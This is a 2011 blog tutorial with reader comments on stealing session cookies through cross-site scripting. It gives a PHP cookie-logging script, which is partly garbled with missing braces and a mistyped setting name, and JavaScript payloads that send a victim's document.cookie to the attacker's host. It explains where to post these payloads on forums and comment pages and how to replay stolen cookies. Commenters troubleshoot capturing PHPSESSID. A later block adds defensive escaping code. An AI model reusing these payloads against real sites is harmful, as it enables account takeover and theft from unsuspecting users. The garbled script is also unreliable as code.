Thursday, January 13, 2011

Session hijacking or cookie stealing using php and javascript

In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft).

Here we show how you can hack a session using JavaScript and PHP.

What is a cookie?

A cookie, also known as a web cookie or HTTP cookie, is a small piece of text stored by the user's browser. The web server sends it to the browser in a response header, and the browser sends it back unchanged every time it accesses that server.
A cookie has an expiration time that is set by the server, and it is deleted automatically after the expiration time.
Cookies are used to maintain a user's authentication and to implement a shopping cart during his navigation, possibly across multiple visits.

What can we do after stealing cookie?

Well, as we know, web sites authenticate their users with a cookie, so a stolen cookie can be used to hijack the victim's session. We replace our own cookie with the victim's stolen cookie to hijack his session.

This is a cookie stealing script that steals the cookies of a user and stores them in a text file; these cookies can later be utilised.

PHP Code:

function GetIP()
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = "unknown";

function logData()
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");



Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)

Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.

Now for the hack to work we have to inject this piece of JavaScript into the target's page. This can be done by adding a link in the comments page of a site which allows users to add hyperlinks etc. But beware: some sites don't allow JavaScript, so you have to be lucky for this to work.

The best way is to look for user interactive sites which contain comments or forums.

Post the following code which invokes or activates the cookielogger on your host.

<script language="Java script">
document.location="; + document.cookie;

You can also trick the victim into clicking a link that activates JavaScript.
Below is the code which has to be posted.

<a href="java script:document.location=''+document.cookie;">Click here!</a>

Clicking an image can also activate the script. For this purpose you can use the code below.

<a href="java script:document.location=''+document.cookie;">

<img src="URL OF THE IMAGE"/></a>

All the details like cookie, IP address and browser of the victim are logged to log.txt on your host server.

In the above codes please remove the space in between javascript.
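The injection described above only works when a site echoes user-supplied markup and link targets back into the page unmodified. The following is an added example, not code from the original post, of how a comment renderer can neutralise both the script tag and the javascript: link; the function names and the forum.example base URL are hypothetical.

```javascript
// Added example (not from the original post): rendering user comments safely.
// escapeHtml, safeHref, renderComment, renderCommentLink and the
// forum.example base URL are hypothetical names chosen for illustration.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode the characters that let text break out of an HTML text node or attribute.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Allowlist link schemes. The WHATWG URL parser lowercases the scheme and
// strips tabs and newlines, so "JaVaScRiPt:" and "java\tscript:" are both
// seen as "javascript:" and rejected instead of slipping past a string filter.
function safeHref(href, base = 'https://forum.example/') {
  let url;
  try {
    url = new URL(href, base);
  } catch (err) {
    return null; // unparseable input is never emitted as a link
  }
  return url.protocol === 'http:' || url.protocol === 'https:' ? url.href : null;
}

// Comment body: always encoded, so <script> arrives as inert text.
function renderComment(text) {
  return `<p>${escapeHtml(text)}</p>`;
}

// User-supplied link: rendered as plain text when the target is not http(s).
function renderCommentLink(href, label) {
  const safe = safeHref(href);
  if (safe === null) return escapeHtml(label);
  return `<a href="${escapeHtml(safe)}" rel="nofollow noopener">${escapeHtml(label)}</a>`;
}

// Constructed sample inputs.
console.log(renderComment('<script>document.location="..."</script>'));
console.log(renderCommentLink('javascript:void(0)', 'Click here!'));
console.log(renderCommentLink('/thread/42', 'Click here!'));
```
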

Hijacking the Session:

Now we have the cookie, what do we do with it?
Download the cookie editor Mozilla plugin, or you may find other plugins as well.

Go to the target site --> open cookie editor --> replace the cookie with the stolen cookie of the victim and refresh the page. That's it! You should now be in his account. Download cookie editor mozilla plugin from here :

Don't forget to comment if you like my post.
by hackiteasy


Hi rohit,
the code is perfectly fine and working. Can you be a bit more specific about what errors you faced?

it works fine but whenever it gets the info it leaves the cookie field blank :/


IP: **.**.***.** | PORT: ***** | HOST: | Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 | METHOD: | REF: | DATE: Saturday 28th 2011f May 2011 05:56:38 AM | COOKIE:

Works great, but for cookies I just get two squashed-up 0's.
Really I am looking for phpsessid.
Is there a way of getting their phpsessid when they click on the link so that it gets saved to log.txt?
Really need your help on this!
Much appreciated!

Works great, however I am trying to get the phpsessid from the users that click on the link!
Is that possible?

Man, it's working.. but in the cookie section I didn't find the cookie.. :(

IP: ***.**.**.** | PORT: **| HOST: | Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 | METHOD: | REF: | DATE: Friday 07th 2011f October 2011 09:09:57 AM | COOKIE:

This one is not telling the cookie... because there is no cookie associated with the site we visited.

This will steal cookies from the site where the link is present.

Well... will try to improve this thing.. But this one's great to keep a track of all computer's IP you ever visited.

Will this method work for a target user using a mobile browser like Opera Mini?

I really don't know what to do, guys. Will you tell me clearly?

In my case, it sent an empty cookie :-s
Could you tell me how to do it?

It doesn't work for random php section id.

Note.. PHP Session Hijacking is a real old method of "hacking" ... It's not going to always work the way you want it unless it's being done on an old/vulnerable site. Other than that, this tutorial and his coding is perfectly fine and is the correct way to get what you need done; it's just, as I said though, you need to use it on a site that is vulnerable to this. Unfortunately not all are anymore. You may be able to find some forums where you can inject a XSS in the calendar and when they click on your event set in the calendar it will capture the session ID. I forgot which forum is vulnerable but there are still a few that may be vuln. Just not all..

What do I send to the receiver, which link? Please help.

I get the cookie, but I think it's not a cookie, because a cookie looks like this 12342e424f42f3efv4jk423 and in the log file I receive the URL address of the person who clicked on my script. If this URL helps to open the ID, tell me how I open it.

